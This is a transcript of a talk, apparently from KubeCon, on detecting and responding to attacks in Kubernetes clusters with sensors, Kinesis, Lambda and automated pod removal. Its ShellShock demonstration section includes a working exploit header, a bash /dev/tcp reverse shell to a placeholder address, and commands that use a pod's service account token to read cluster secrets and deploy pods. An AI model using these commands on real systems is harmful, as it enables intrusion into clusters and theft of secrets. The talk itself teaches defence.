All right, the official iPad clock says 11:55, so why don't we get started? My name is Dino Dai Zovi. This is my first time attending KubeCon, and also my first time speaking at it. But I was our first Kubernetes admin; I set it up, and then we hired Traver, who I basically handed all of that to. So I've done a good amount of this stuff, but I wanted to talk about how to scale the defense against attacks as you grow your infrastructure, especially in Kubernetes environments, because what we're seeing in a lot of places in the industry is that we're no longer held back by the amount of infrastructure time we have available. We can scale the number of nodes with a click, click, click on the cloud, and you're done. So let's talk about how we actually approach security in those environments. My background is what I call breaker turned builder. I spent a lot of time breaking security. I started in red teaming, did a lot of security consulting, penetration testing, breaking into websites, software applications, a whole bunch of stuff. I wrote some books on hacking iPhones and Macs. I won a contest called Pwn2Own, where I hacked a Mac in a night, did a bunch of that stuff in the security world, presented at the Black Hat Briefings about how to write hypervisors, how to exploit memory corruption, all that sort of thing. But over the last several years, I've taken a shift in direction and focused instead on using my understanding of attacks to build security, and especially to build it at scale. I was director of security at Two Sigma Investments, my first exposure to services-oriented environments and some of the challenges there. I spent the last several years at Square and just recently founded a company called Capsule8, where we're building the industry's only real-time attack disruption platform, purpose-built for cloud-native environments.
And let me tell you about what I'm trying to solve here. In the security industry, we're talking a lot about the cybersecurity skills shortage. And there are a bunch of statistics, some of them pretty ridiculous, about just how many people we need in order to actually make computing safe and stop breaches from being a regular part of daily life. And the problem with this is, I think it's just fundamentally trying to scale the wrong way. Saying, yeah, we need 10 gazillion people to manually look through alerts, to manually audit all this code, to manually find every vulnerability, to manually patch every vulnerability. If you've ever written software, which hopefully most of us have, you realize that maybe that's not the best way to go about it. And security wasn't the only domain with this problem. Operations was as well. You had to rack and stack machines, and every machine had to be configured individually as a special snowflake. And I guess it goes without much explanation that that is a pretty antiquated way of looking at things now. What illustrates this most clearly, I think, are statistics on the number of servers per employee at different types of firms. At the average company, it's less than one to one. But Facebook and Google are clearly at a scale well beyond that. And how did they do that? They did it by treating operations like a software problem. And this pattern is what we now call the cloud. That's how I view it. It's basically just another instance of software eating the world. So first software ate ops, and now it's eating security. And it's gonna be really interesting, because it's gonna change a lot of how I typically did things and how a lot of people I know did things. But I think it's for the better. So what do I want people to take away from this talk?
I want people to think about how we apply a lot of the things we've learned from the SRE and DevOps transformations to security. My thought exercise for a lot of this is: I saw that ops was once very similar to where security still is today. So what principles did they learn, and which of those apply, so we can start from something that works? One of my favorite quotes is from, and I'm gonna brutalize his name, Werner Vogels, CTO of Amazon: you build it, you run it. This is their philosophy, very similar to SRE and DevOps, of putting the responsibility on the people that are closest to being able to fix the code. And that's how you can scale. It doesn't mean you're responsible for everything. You still have infrastructure teams building infrastructure, and you can still have SRE teams helping you, but you don't have one team that's fully responsible for it. We still typically have one team that is fully responsible for security, and that's why it doesn't scale. So I think the new mantra should be: you build it, you help secure it. Security can only scale with shared responsibility. And the more we can push to self-service for application developers and infrastructure teams, the better this scales. It actually doesn't require a PhD in the defense against the dark arts. It's all very simple stuff. What I'm gonna talk about today is how to build a continuous security pipeline in cloud-native environments and understand which principles of SRE and DevOps apply to security. So, starting with a little background, here are some of the models that I think are really good to look at. The one that I know best is the mobile security pipeline at Square that my team and I built.
It's a server-driven detection framework operating on millions of devices running thousands of firmware versions in order to identify tampering, jailbreaking, or rooting, even if it's previously unknown. So if you have a root that only you wrote, the system can detect it, and it's pretty cool. I also looked at how Google did a lot of their security monitoring with data mining. One of the takeaways they learned that I think is really useful is that purely statistical, machine learning approaches had very poor results. And one of the reasons why is because in machine learning, an 80% true positive rate is actually pretty good. That's an academic result. In security, that's equivalent to a 20% false positive rate, and in security, 20% false positives is really bad. What that also means is that as you scale the workload and the number of servers, that volume of false positives basically becomes a data problem in its own right. Beyond saturating human attention, you have now saturated your servers and your entire pipeline. So that's some of the experience that they had that I think is pretty useful to look to. Most recently, Netflix gave a presentation about how they approach security monitoring. They are using eBPF, which, if you haven't started looking at eBPF, is really awesome, but it's also really complicated and requires a really new kernel. I'll talk a little more about that in a bit, but I think some of their requirements were pretty illustrative. One, they needed the system to be event driven. You can't poll the network and be like, hey, are you hacked now? No? Cool, I'll come back in 10 minutes. How about now? You hacked now? How about now? For attackers, it's pretty easy to come in, get out, and be done. Because in the desktop world, when you're thinking about the security of especially advanced attacks, you might watch an attacker for 60 days before you begin to evict them.
How many of you want to let an attacker roam around your production environment for 60 days? I mean, you should probably start looking for a new job after day one. I think 60 minutes is too long. I think 60 seconds is too long, because it's very easy to get a lot of data out fast. So we have to really change the cadence here, and that's why it must be event driven. Also, the system must be lightweight. When you have a lot of nodes, the performance overhead scales really quickly and gets really expensive very fast. And they also wanted kernel-level inspection, because of how many attacks against the Linux kernel are being released today; there are entire open source frameworks full of exploits. And if you think about how long it takes someone to exploit a vulnerability and publish the exploit versus how long it takes you to patch your kernel across your entire fleet, you do the math and you're like, oh, this is a really hard battle to win. So that's what they were looking for, and what they ended up settling on was eBPF probes, which are programmable, lightweight, safe probes that you can run in the kernel on Linux trace events. I'll talk a little more about that in a bit. But at the broadest scale, what we're looking to do to secure our systems is apply the five factors for secure systems, which I'm ripping off from Magoo. You start with one, response: make sure that you'll be able to know about a threat and respond to it effectively. Second, evidence: make sure there's enough evidence that you can actually reconstruct what happened and learn, because usually there'll be one thing that you see is off, and you need to be able to backtrack and see all the significant things that happened leading up to it. There's a good balance there between that and performance. And also focus on containment, so that you can limit the impact.
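To make the earlier false-positive arithmetic concrete, here's a back-of-the-envelope sketch. All of the volumes below are made-up numbers for illustration, not from any real deployment:

```python
# Back-of-the-envelope: why a 20% false positive rate breaks at scale.
# The event volumes here are illustrative, not from any real deployment.

def daily_false_positives(events_per_day, alert_fraction, false_positive_rate):
    """Alerts that are wrong, per day."""
    alerts = events_per_day * alert_fraction
    return alerts * false_positive_rate

# A modest fleet: 1,000 nodes emitting 10,000 security events each per day,
# with 1 in 1,000 events surfacing as an alert.
events = 1_000 * 10_000
alerts = events * 0.001
noise = daily_false_positives(events, 0.001, 0.20)
print(f"{alerts:.0f} alerts/day, {noise:.0f} of them false")

# At ~2 minutes of analyst time per alert, the noise alone eats whole
# analyst-days, and it grows linearly with every node you add.
wasted_hours = noise * 2 / 60
print(f"~{wasted_hours:.0f} analyst-hours/day spent on noise")
```

The point is the same one Google hit: an academically respectable true positive rate turns into an operationally unsustainable alert stream once the fleet gets big.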
So there's typically a spectrum between prevention and response, and the bottom three factors are more on the prevention side. Prevention is the hardening: you set up your environment, you basically make sure you've configured it correctly, and then you walk away, right? And you can't have just that. It's sort of like, okay, we built a good bank vault, we put it in the middle of Central Park, and we've done our job, it should be fine, and we'll just not look at it. A whole security program requires monitoring and response, because we know there are known unknowns. We know there are new vulnerabilities, we know there are new attacks, and so we need to actually be on the lookout for when those happen so that we can respond effectively. And the cool thing about online services environments is that the attacker is on your turf. So if we think about the game of attack versus defense, the attacker gets to choose the timing and the method, whereas the defender gets to prepare the battlefield. You can carve a nice little valley that looks really tempting, and you can wait for them to walk down it and just watch them. That's your prerogative as the defender. I like playing chess, I like thinking about strategy. Well, that's how I do defense too. I set traps, I make really easy avenues that I can watch really effectively and respond really quickly to, because the attacker has no way of knowing that. That's where I can turn information asymmetry to my advantage. So that's why I think the response game is a lot more fun, and hopefully it'll get you all interested in it as well. But then we look at prevention: make sure you're patching and all this other stuff, because don't rely on a safety net if you don't have to. And elimination: can you innovate your way out of an entire class of vulnerability?
And I think this is a really good way of breaking down this process, sort of like the 12 factors are for stateless apps. So what should we call this thing? This is actually a common joke; I heard it in the last talk as well. Do we call this SecDevOps? Do we call it DevSecOps? How about DevOpsSec? It's like, hey, I can permute. We've all been in programming interviews. Or maybe we'll call it SecOps. What I think of this as is continuous security, because the real technology that people are getting out of the cloud is continuous delivery. And when you start thinking about everything in this continuous cycle, you start thinking about big data differently: you think about fast data, not big data. You start thinking about how you architect systems differently. And you start thinking about security differently as well. That's why I like emphasizing continuous security. So what does that mean to me? It's a software-driven pipeline for securing systems. We act like we're benchmarking a piece of infrastructure or software: do macro benchmarks and then optimize and optimize and optimize, so that you know you're applying your defenses, your effort, in the right place. And it doesn't require having a dedicated security team. So I'm gonna show you a really, really simple architecture that is basically a blog post, and it should look a lot like the sort of case studies you'll see from a cloud provider on how to build a streaming IoT analysis pipeline. It's pretty much the same thing. But in order to guide how we're gonna think about this, let's work backwards, again ripping off Werner Vogels. So let's start talking about server breaches. How many of you have actually breached a server, gotten remote access? All right, wow, I lost that bet. That's great.
And so for those of you that haven't done penetration testing and things like that, I think it's really illustrative to see what it's like, so you can know what you're defending against, because attacks pretty quickly fall into a lot of common patterns. But I'm gonna talk only about Kubernetes environments. There's a lot of ways to do stuff, but Kubernetes is the new shiny, so let's talk about that. And what do we care about the most? We care about remote command execution vulnerabilities, the ones that actually let people breach the server. Some high-profile ones in the last few years included ShellShock, ImageTragick, a huge number in Apache, notably the Apache Struts vulnerability that affected Equifax, and the entire class of Java deserialization vulnerabilities that some people called Mad Gadget. The common theme with all of these is they're executing a shell. And then you're like, wait a minute, I don't really run shells in my containers that often. Now you have a signal that you can home in on. There are other things you might wanna look at, like people SSHing into a shell or SSHing into a container to fix something in production. This isn't always malicious, but it's probably something you at least wanna keep your eye on. And if people are doing this, it's probably a signal that they need an easier way to do their job. So how I like doing this is I like building monitoring, and then you'll see insecure practices and you'll say, hey, all right, now I know the use case. Let's figure out something that meets that use case and is safe, and help people do that. It's sort of like the wisdom of the iPod. People were downloading MP3s, and people clearly wanted a digital music experience. They wanted the instant gratification of grabbing a song and listening to it on the go. And you could either fight it and call it piracy, or you could build the largest music store in the world.
I think we know which one actually was more effective. So let's go over a generic data breach scenario. First, what attackers are gonna do is they're either gonna scan your infrastructure in particular or they're gonna scan the entire internet. It's really cheap to scan the entire internet. So even though we all think we're special snowflakes, don't always think every attack is actually about you. It might just be opportunistic, and then they might come back and see which hosts are actually interesting. It's pretty inexpensive to just scan the internet for these types of vulnerabilities. And actually, when I set up our cluster and set up Ingress on AWS the first time, I was amazed at how much attack traffic was just going continuously. You just set up anything on AWS and boom, within minutes you're getting probed for a bunch of things. So let's try to make their job a little harder. But let's say they find one of these vulnerabilities and they're able to get a shell in a container. What I find interesting is that a lot of attention is paid to securing the container, or securing the host, the kernel and that environment, from the container, but not as much to the entire cluster. And when you think about it, the cluster is what matters. An individual node, you know you'll burn it down. We burn ours down within 24 hours; it's just gone, next. So compromising a node is not all that interesting. But compromising the entire cluster and persisting that way is way more interesting when you think about what an attacker is actually trying to do. So we're gonna talk about a couple of ways that are trivial to compromise Kubernetes clusters. And I don't feel bad talking about them, because they're not vulnerabilities. There's just no security there. It's not that they tried and failed; it's just not there. So I consider it an obligation to make sure people know the limitations and make their own risk trade-off.
And then they establish persistence and move laterally within that cluster; that's basically how it's gonna work. So let's start with ShellShock. ShellShock is one of my favorite vulnerabilities, and you'll see why. Even if people have never exploited a vulnerability, if they've used a Linux shell a little bit and they've used curl, which many people have, you can show them how to exploit it in two minutes. And they can start playing around with it and seeing, like, whoa, wait, I can run commands. Is this really how easy it is? And you're like, yeah, that's pretty much how easy it is. This was a vulnerability that abused some functionality in Bash where Bash would parse exported function definitions in environment variables. In that syntax, you could add extra commands, so that when the next Bash subshell was parsing and adding that function definition to the environment, it would also execute that command. So that's the basis of ShellShock, which is generally fine on the same system, but sometimes you can pass environment variables across a security boundary. For instance, a lot of HTTP headers get turned into environment variables. This happens in, you know, CGI, but it also happens in PHP and a lot of other application environments where you may not expect it. People were also able to pop DHCP clients with this, a lot of fun stuff. So let's engage in a little YOLO and see if my asciinema link actually works. No, come on, open link, there we go. Sorry, this is my first time using Google Slides for a presentation. And that one, that one, cool. Okay, so this is how easy it is to exploit ShellShock. We're going to connect through a port forward to a vulnerable ShellShock container running in our Kubernetes cluster. It's just a standard Apache server, but kind of old.
These came with a test CGI that was just a shell script, and this is kind of historic. This was true when I was a teenager, which means basically it's been true forever. So you won't find this as much these days, but it's still the default. And that's one of those instances where you can pass environment variables: you can see that those variables are HTTP headers. So let's play some ShellShock. What we're going to do is pass a specially formatted value through the Content-Type header, because we can see that Content-Type is one of those headers that gets turned into an environment variable. And we're going to do the magic incantation and try to run a command. So let's just try to run id, and we get a 500 error. It doesn't really tell us very much. I don't know if it worked, I don't know if it didn't. So now let's try something that will tell us whether it worked, like a sleep. One, two, three, four, five. I have a pretty good idea that that worked. But let's be sure. Let's try with two. I can pretend I'm typing to make it more interesting. One one-thousand, two one-thousand, boom. So now we have this deterministic feedback loop, which really tells us as an attacker that we have some element of control. And the process of attacking systems is finding some element of control, leveraging it for more, leveraging that for more, and building your way up, just like writing software. I think the best metaphor I've heard people describe hacking with is that you're building software out of someone else's software, out of an existing ecosystem, and you have to kind of invent every single step of the way. So I find that people who have done a lot of programming tend to like it. But just making a remote process sleep is not that interesting. What is a little more interesting is getting a remote shell.
So we can use the bash command line that I pasted in there to use functionality built into bash to redirect from a socket and back to a socket and connect out. So now we're actually hacking. So let's go to the next one. Yes. What the attacker also does is set up a listener, just like a netcat or something like that. So I'm gonna bounce to my AWS jump box. Now I have to change the IP address, because I just gave it away to all of you. All right. And so you can just listen; this is what we're doing in a different window while that's also happening. And so we're just gonna run that command and wait for a connection. Boom, we got a shell. And it tells us there's no job control in the shell, because bash is not really running with all the normal system bits that it expects. But we can see the current directory, we can list the files, and as an attacker, what you're gonna do is look around. You're like, well, where am I? What's going on here? And you can see from the hostname that we're in a Kubernetes pod. So, oh yeah, running Linux, relatively recent, CentOS 7, and that's basically where the game starts. Now where it gets really interesting is privilege escalation from here. Okay, so these work, we're gonna talk about those. Good, good, good. Yeah, so before we move on to privilege escalation: if you wanna play along at home, we publish this container, so it's really easy to launch ShellShock and then actually see what an attacker can do in your cluster, which I really recommend. But pay attention to the red warning at the bottom. Don't expose the port, only do the kubectl port-forward, because this is a remote vulnerability. But it's not the only one in your cluster, I'm sure, so it's probably fine. I'm not your normal security guy. I used to jump out of planes. Most security people don't do that. Because it's not safe, why would you do that?
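The probe and reverse shell from that demo, condensed into a sketch. The target URL, port-forward, and listener IP are hypothetical placeholders, and the script only assembles the commands into strings rather than sending anything, so you can see the shape of the attack without a vulnerable container handy:

```shell
# Sketch of the ShellShock demo. Hypothetical target reached via
# `kubectl port-forward`, e.g. a vulnerable test CGI on localhost:8080.
TARGET="http://localhost:8080/cgi-bin/test.cgi"

# Classic ShellShock payload: a function definition followed by an extra
# command that a vulnerable bash executes while importing the environment.
shellshock_header() {
  printf '() { :; }; echo; %s' "$1"
}

# Timing probe: if the response takes ~5 seconds, we likely have execution.
probe_cmd="curl -s -H \"Content-Type: $(shellshock_header '/bin/sleep 5')\" $TARGET"

# Reverse shell: bash's /dev/tcp redirection, connecting back to a listener
# you run elsewhere (e.g. `nc -l 4444`). The IP below is a placeholder.
revshell_cmd="curl -s -H \"Content-Type: $(shellshock_header 'bash -i >& /dev/tcp/203.0.113.10/4444 0>&1')\" $TARGET"

echo "$probe_cmd"
echo "$revshell_cmd"
```

Only run the assembled commands against a container you own, behind a port-forward, exactly as the warning in the talk says.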
But, so this lets you see what an attacker sees if they land a shell. You can basically do that and play around with hardening. But now you're just an unprivileged user, and as you can see, I followed all of the best recommendations, because I was running the web server as an unprivileged user. But that doesn't matter, because what does root in a container really mean? And now, the problem is that a lot of Kubernetes configurations are incredibly weak. They don't have RBAC turned on by default. And even some tools, like, so that cluster was installed with kops, and it doesn't enable RBAC. So basically every container is full cluster root, all the time. From that shell, you can download kubectl and just start executing stuff: deploy a new pod, deploy a privileged pod, whatever, it's great. And even if that's fixed, if you're using Helm in your cluster, Helm also doesn't require any authentication. So you can just talk to the Tiller service and be like, hey, install this chart, and you have full cluster root again. For a live demo of that, and this is going a little bit on a tangent, I did a quick talk at Kubernetes NYC on this; it's at this YouTube link. I just went through it in 10 minutes and it was pretty fun. But we're playing defenders today; I'm not gonna teach you all how to cause mischief. So we wanna work backwards from the breach. According to this template, how do we build a system to monitor and detect this? One, we know that we need to monitor process execution within containers, right? And we need it to be fine-grained. We also need to monitor network connections, because we wanna know, for instance: how many pods do you have that actually have a legitimate need to talk to the Kubernetes API? Usually it's the kubelet, not necessarily your pod. So that might be a good thing to watch for. And then you can figure out when a pod that never does that even attempted it.
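To make the "full cluster root" point concrete: from a shell in a pod on a cluster without RBAC, the escalation looks roughly like this. The service account paths are standard Kubernetes conventions, the kubectl download URL is illustrative, and the commands are only assembled into strings here, never executed:

```shell
# Sketch: why "every container is full cluster root" without RBAC.
# Commands are only assembled as strings, never run.

# Kubernetes mounts a service account token into every pod at this path.
SA_DIR=/var/run/secrets/kubernetes.io/serviceaccount
TOKEN_PATH="$SA_DIR/token"
CA_PATH="$SA_DIR/ca.crt"

# The API server is reachable in-cluster at a well-known DNS name.
APISERVER="https://kubernetes.default.svc"

# Without RBAC, that token can read every secret in the cluster...
list_secrets="curl --cacert $CA_PATH -H \"Authorization: Bearer \$(cat $TOKEN_PATH)\" $APISERVER/api/v1/secrets"

# ...or you fetch kubectl into the pod and deploy whatever you like,
# including a privileged pod (download URL is illustrative).
get_kubectl="curl -LO https://storage.googleapis.com/kubernetes-release/release/v1.9.6/bin/linux/amd64/kubectl && chmod +x kubectl"
escalate="./kubectl run pwn --image=busybox --restart=Never"

echo "$list_secrets"
echo "$get_kubectl"
echo "$escalate"
```

On a cluster with RBAC properly enabled, the same calls come back as 403s, which is exactly the hardening gap the talk is pointing at.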
Also, which pods should be connecting to your Tiller service? Almost nothing, right? And so that's another thing you can set a guard rail on. Not a guard rail, I think it's more of an electric fence. What you also wanna make sure your system does is log every attempt, because even unsuccessful connections are a good signal. If you have strict egress filtering so that no one can get out of your cluster, anything trying to get out is a pretty good signal you wanna watch out for. And it'll tell you when something goes wrong. It's either software that needs to be fixed or some situation that needs to be responded to. So let's talk about how we actually build a continuous security pipeline to get this. Our strategy is: first, we want to gain visibility into the activity on our infrastructure. We wanna make sure to enable investigation into past activity, because whatever we see is the tip of the iceberg. Something acts out of place, and we're gonna wanna drill down deeper and see what's really happening and what led up to that point. And in order to scale, we don't wanna pore over the logs. We wanna start writing hard-coded logic to generate alerts for this activity. And this is actually the part that I find people have the most fun with, because this is where you take some of the principles of SRE, where you bound your toil so you don't spend all of your time responding manually: you start automating responses. If something does something weird, just shut it down. Even if you're not a security expert, just shut it down. Basically, if something is acting anomalously, you can just kill it and move forward. And then, if you have enough of a forensic trail, you can give that to a security expert, hire a security company, and be like, hey, what went on here? Because I don't know. But at least you're defending yourself.
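That "just shut it down" loop doesn't need to be fancy. Here's a sketch of a responder; the queue URL and the alert JSON shape are hypothetical, and the real aws/jq/kubectl pipeline is left commented so the sketch stands alone without credentials:

```shell
# Sketch of an automated responder: drain alerts from an SQS queue and
# kill the offending pod. Queue URL and alert schema are made up.

QUEUE_URL="https://sqs.us-east-1.amazonaws.com/123456789012/security-alerts"

# Each alert body is assumed to be JSON like {"namespace":"...","pod":"..."}.
JQ_FILTER='.Messages[]?.Body | fromjson | "\(.namespace) \(.pod)"'

# The live loop would be (requires aws-cli, jq, kubectl and credentials):
#   aws sqs receive-message --queue-url "$QUEUE_URL" --max-number-of-messages 10 \
#     | jq -r "$JQ_FILTER" \
#     | while read -r ns pod; do kubectl delete pod -n "$ns" "$pod"; done

echo "would poll $QUEUE_URL and delete any pod named in an alert"
```

A dozen lines of shell on a timer gets you the "kick any offending pod" behavior described later in the talk; you can replace it with something sturdier once the alert volume justifies it.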
And also build the automated responses to alerts. And do this iteratively. I really like the principle of starting small and iterating, because what I'm gonna show you today is really simple, but it gives you something that you can set up in a few hours and start having some capability to do this, and to dive deeper as you find that you need to. Because if your visibility shows you that you don't really have any security problems, that you've already hardened everything perfectly, you can just stop there. But you have the safety net. And you can come back to it every quarter and see if stuff's happening. It's better than blindly just not knowing. So how are we gonna build the pipeline? First, we're gonna have an event-sourcing architecture, with events gathered from various sources. Existing data sources are good, logs are great, but they usually don't give you as much information as you'd want. So I recommend implementing sensors at various components and various stages of your environment: monitoring build pipelines, monitoring production behavior as things run, so that you can get more data to feed into this continuous security pipeline. We analyze these events and generate alerts, and for all of the alerts, you should always prefer automatic response where possible. And given that we're in a cycle, we can change the way our hosts are deployed to make automatic responses more effective and more possible. We can change the software and work with the teams to make this capability as effective as possible, just like you would if you were maintaining the performance of production infrastructure. What you do is reserve your human time to monitor the alerts, do manual investigation, tune the sensors to get more or less data depending on what you need, and automate the responses. So the way that we set this up for our test bed is we have a Kubernetes cluster. It's got an auto-scaling set of nodes.
And we have a sensor running on every node, and then a log feeder that basically sends everything to AWS Kinesis. We use Kinesis because I don't really want to manage a bunch of this stuff. Kinesis is like, simple, done, you do it. And same thing with Lambda. It's like, cool, you scale that. Done, because that's not really what I'm good at. So I'll just let you do it and I'll focus on writing the logic instead. And then one of the outputs you can configure with Kinesis Firehose is Elasticsearch, and this gives us a Kibana instance, so we can use the web to browse and go through this data. So this is actually pretty simple; it's a couple days of work to actually make it. So it's not really that much. And here's a little deeper dive on how Firehose connects to Lambda. Kinesis Firehose lets you use Lambda for transformation functions. For us, we're just going to use the identity function. Basically, as a transformation, just return the same event. And on the side, if something is interesting, we're going to publish an alert to an SQS queue. And then we can monitor that SQS queue for those alerts and actually automatically respond. So it's actually sort of super easy here. And we can write detection logic in JavaScript or in Python. The nice thing about that is it scales pretty well with the complexity of the logic. It's pretty tempting to make a DSL, but this is not that complicated. These are JSON records, and you're writing code to look for a string match, verify some conditions. Why do you need a DSL for that? But when you have a full programming environment, you can scale to more complexity as you need it and not get bounded and stuck by the DSL. As for the event sources that are interesting, look at your environment. I'm talking AWS just because that's the one that I speak natively, so translate where appropriate to Azure, GCP, or internal infrastructure. CloudTrail is good. Get all the API activity.
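A minimal sketch of that transformation function in Python. The event schema and the "interesting" condition are assumptions for illustration; a real Firehose handler would also base64-decode the records and publish alerts to SQS with boto3, both elided here:

```python
import json

# Sketch of a Firehose transformation Lambda: pass every record through
# unchanged (the identity transform) and flag interesting ones for an
# SQS alert on the side. The event schema below is hypothetical.

SHELLS = {"/bin/sh", "/bin/bash", "/bin/dash"}

def is_interesting(event):
    """Hard-coded detection logic: a shell executing inside a container."""
    return (event.get("type") == "process_exec"
            and event.get("in_container", False)
            and event.get("path") in SHELLS)

def transform(records):
    """Return (records unchanged, alerts to publish to SQS)."""
    alerts = []
    for record in records:
        event = json.loads(record["data"])
        if is_interesting(event):
            alerts.append({"alert": "shell-in-container", "event": event})
    # Identity transform: every record goes through untouched.
    return records, alerts

# Exercise the logic; in a real Lambda each alert feeds sqs.send_message.
sample = [{"data": json.dumps(
    {"type": "process_exec", "in_container": True, "path": "/bin/bash"})}]
records, alerts = transform(sample)
print(len(records), len(alerts))
```

This is the whole argument against a DSL: it's JSON and string matches, so plain code works, and it keeps working as the conditions get more complicated.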
See when that stuff is being used. You want network monitoring, so you can see all your VPC flow logs for all your network activity. But there are some limitations here: you don't see things within your Kubernetes cluster as well, and you definitely don't see them within a pod. And then system monitoring. In order to get system-level behavior, you want a system monitoring agent. There are five that I talk about here. There's Capsule8, the open source sensor that we're releasing right about now. I say right about now because I tried to do it today; it'll probably happen tomorrow. go-audit is a pure Go implementation of audit using the kernel audit subsystem. gobpf is part of the IO Visor project. All of these are GitHub URLs, you can just go there. And it lets you actually write BPF probes that run. I thought I had an hour. Cool. And, oh, there's osquery, which is also really popular, really cool. And Sysdig. So all of these are good, and what you want to do is dive in deeper. I've got five minutes, so I'm going to go through this a little faster. Dive in deeper and see what actually happens. There are a couple of trade-offs for each of these. Going by the Netflix criteria: must be event driven, must be lightweight, must give kernel-level inspection, and must be kernel-version independent. Naturally, the one that we wrote from the ground up checks all those boxes, because that's why we wrote it. The other thing is that audit has terrible performance. The kernel subsystem is synchronous, so when it starts filling the backlog queue, it halts the activity. And if you're monitoring something like system calls, you will hit that backlog limit even if you ratchet it up, and the system will halt. And you will get a parabolic performance penalty. So that's just not an option in a lot of environments. Anything using Linux tracing performs much better.
Capsule8, Sysdig, and gobpf all use Linux tracing under the hood, so they perform a lot better. And a shameless plug for our sensor: it's a single static Go binary. We don't use cgo; you just run it, it's fine. It uses all userland APIs, so it doesn't violate a signed kernel image, and it works everywhere from kernel 2.6 and up. It's very much in development because we're still building it. It's alpha, you've been warned, but it's Apache 2.0 licensed, so you can play with it.

This was the piece of our infrastructure that sent all those logs to Kibana for manual search. You can now do things like say: hey, if someone launched a BusyBox container in my infrastructure, show me where that happened. Then you can search for that unique container ID and say: show me everything that happened, give me all the process execution events, and see everything there.

And yeah, I talked a little bit about Lambda. It's easy because it scales up, and the language scales up with you, whether you're familiar with JavaScript, Python, or Java. When you're automating responses, you can take events off that SQS queue, and don't overcomplicate it: you can write a simple shell script that calls the AWS SQS command line, pipes it to jq, pipes that to kubectl delete, and boom, you have an automatic thing that kicks any offending pod. You can do this at each tier of your infrastructure.

As you develop this, the thing you want to do is keep escalating both the attacks you can simulate and your responses, so you keep training yourself. Play with some open source security tools, but I recommend doing things like: if you have a bug bounty program, try to find the researchers before they report the vulnerability.
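A minimal sketch of the SQS-to-kubectl responder described above. The alert schema is hypothetical, the AWS and kubectl calls are shown but commented out (they need credentials and a cluster), and the jq paths should be adjusted to whatever your detections actually emit:

```shell
# In the real loop you'd fetch the next alert like this (needs AWS creds):
#   msg=$(aws sqs receive-message --queue-url "$QUEUE_URL" \
#         --query 'Messages[0].Body' --output text)
#
# For illustration, use a canned alert body instead:
msg='{"alert":"busybox-launched","namespace":"default","pod":"busybox-1234"}'

# Pull the offending pod and namespace out of the alert with jq.
pod=$(echo "$msg" | jq -r '.pod')
ns=$(echo "$msg" | jq -r '.namespace')

# The actual response: evict the offending pod (commented out here).
#   kubectl delete pod "$pod" --namespace "$ns"
echo "would delete pod $pod in namespace $ns"
```

Wrapped in a loop and pointed at a real queue, that's the whole "kick any offending pod" automation: no framework needed.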
Hire a penetration testing team and try to detect them before they report. And when you get really advanced, hire a red team that tries not to get caught, try to catch them, and try to make their life hell. Once you're at that level, most attackers are going to have a really hard time attacking you, and you'll be doing this across your entire environment. Yay, thank you for your time. I think I'm out of time now, so if there's any questions, please come up. Yes? Yes, yeah, they're hot off the presses. Okay, so they gave me the five minute sign, so I will just do Q&A until they kick me off the stage. All right, next?

Sure, yeah, that's another thing we made sure to design around. When you have local service proxies and all these other things, what you want to monitor is who the container thinks it's talking to, because the service mesh and everything else will change how the traffic gets there, but which service it discovers and reaches out to is what really matters. When you're using Linux tracing-based infrastructure in containers, you're monitoring the system calls, so you see the address that the application is passing to the kernel, and that's how you can identify where the traffic is going. There's definitely some work you need to do on the backend to enrich the events with where that service was at that time, but you want to know "this application is trying to talk to Tiller," not be stuck with an IP address and then, three days later, trying to figure out what was running on it. The anti-pattern of security monitoring in the modern world is looking at an IP address and going: okay, cool, I had 100 containers running on that IP address five days ago, or 30 days ago. What do I do now?
It's just no longer a meaningful identifier. And then there are things like domain fronting, which works really well in the cloud. Domain fronting is a technique where you connect to a web service under one name, so your DNS lookup is for one name but your HTTP Host header is for another. Google and a lot of other services work this way, where you can reach any service from any entry point; if you think about how Ingress works, you can see how that happens too. So it's really easy for an attacker to evade these IP-address-based things. Yes?

Yep, I have a little bit. One of our engineers installed Container Linux, or Clear Linux, and went to town on it, and then everything broke, and he found out it was a little more work for his desktop than he wanted. But here's what I discovered from being on both sides, as a security person saying hey, we need to reduce attack surface: initially, for our own development, we started with FROM scratch Docker containers, and then debugging those in production was impossible. Debugging things like: hey, why is this container not able to resolve this service? Everyone else can, but that one can't. I don't know. What does it think it's connecting to? You can't get a shell in there, and people have workarounds for that, but how I resolved this myself is that the extra two megs for FROM busybox or FROM alpine are well worth it for the debuggability. What you really care about is the security boundary outside the container: having a shell in there is no big deal, so focus on the container security boundary and the cluster security boundary.

And one of the limitations of a lot of the hypervisor-based container runtimes is that they don't really do much for the interface to the Kubernetes API. You still have cluster root; you just can't do anything to the node. So I'm like, all right, a lot of good that does. Wait, behind you?
No, we just realized that the magic of BPF is really Linux tracing. You can get all of that through perf: you basically get all the kprobes, tracepoints, and uprobes through perf, and that goes back to 2.6.39. What BPF gives you is the ability to do advanced filtering, but even with just the existing trace events you have a rudimentary AST-based filter built into the kernel. You can do logical expressions and other things so that you're not throwing every event up to userland, and when you are throwing events to userland, it's over a high-speed ring buffer, so it's actually not that bad. If you look into the architecture of Sysdig, they have a kernel module to do stuff that the kernel already does: you already have the ring buffers through perf, you already have the trace events accessible through perf. And I'd like to indirectly thank Brendan Gregg for his blog posts, because that's how I figured this stuff out. I was like, oh, that's cool. Any other questions? Yes, sir?

Similar to the Clear Containers project, I see a lot of this hardening as necessary but not sufficient. I don't want to denigrate this work; it's all really cool, and I wrote a hypervisor in a past life, so I think that stuff is really cool. It's a really good way to get host isolation, but there are performance downsides: you're basically committing a bunch of RAM, and the kernel interface is generally pretty good anyway. And they don't do much for orchestrator-level security. When I work backwards from a breach and think as an attacker — how am I going to attack this, how am I going to achieve the objectives that I want? — once I see a security project going in a certain direction, as an attacker, I just don't even bother looking there. I can't remember who had the quote.
They said something like: cryptography is great, it tells me as an attacker where not to look. Don't even bother, you know? I see the same thing with memory protection systems like ASLR, where you randomize locations. When you're an attacker, it's easy to start thinking about the strength of ASLR in terms of the number of bits of entropy, doing a quantitative analysis, but whether it's really four bits or 256 bits doesn't matter much, because once there's more than one bit of entropy, as an attacker you're going to start working around it instead. That's how I see a lot of the hardening: there's a lot of effort there, you don't really know what's going to be there, but you know that Kubernetes doesn't really do a lot currently. Yes, it does, yes, it's a good point.

Yeah, we don't yet, and for our internal system that this is based on, it's a big blind spot. So until we fix that, no one go hack our build servers, please. Oh, sorry: he pointed out that the Kubernetes API servers have an audit log, and that would be an excellent event source for this system, so you could see when a pod is abusing the API or abusing its privileges. Thank you. Any other questions? Yes, sir?

